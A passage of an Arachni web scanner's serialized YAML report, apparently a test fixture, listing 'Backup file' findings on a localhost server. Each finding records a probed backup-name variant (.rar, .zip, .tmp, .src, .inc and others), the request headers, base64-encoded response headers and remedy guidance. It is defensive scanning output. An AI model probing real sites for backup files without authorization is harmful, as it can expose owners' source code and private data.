naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.saved elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.saved injected: some_filename.php.saved id: some_filename.php.saved elem: path remarks: {} method: '' response: some_filename.php.saved headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.saved elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.saved injected: some_filename.saved id: some_filename.saved elem: path remarks: {} method: '' response: some_filename.saved headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTk= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.rar elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.rar injected: some_filename.php.rar id: some_filename.php.rar elem: path remarks: {} method: '' response: some_filename.php.rar headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.rar elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.rar injected: some_filename.rar id: some_filename.rar elem: path remarks: {} method: '' response: some_filename.rar headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.src elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.src injected: some_filename.php.src id: some_filename.php.src elem: path remarks: {} method: '' response: some_filename.php.src headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.src elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.src injected: some_filename.src id: some_filename.src elem: path remarks: {} method: '' response: some_filename.src headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.tmp elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.tmp injected: some_filename.php.tmp id: some_filename.php.tmp elem: path remarks: {} method: '' response: some_filename.php.tmp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.zip elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.zip injected: some_filename.php.zip id: some_filename.php.zip elem: path remarks: {} method: '' response: some_filename.php.zip headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.zip elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.zip injected: some_filename.zip id: some_filename.zip elem: path remarks: {} method: '' response: some_filename.zip headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.inc elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.inc injected: some_filename.php.inc id: some_filename.php.inc elem: path remarks: {} method: '' response: some_filename.php.inc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.tmp elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.tmp injected: some_filename.tmp id: some_filename.tmp elem: path remarks: {} method: '' response: some_filename.tmp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.inc elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.inc injected: some_filename.inc id: some_filename.inc elem: path remarks: {} method: '' response: some_filename.inc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.copy elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
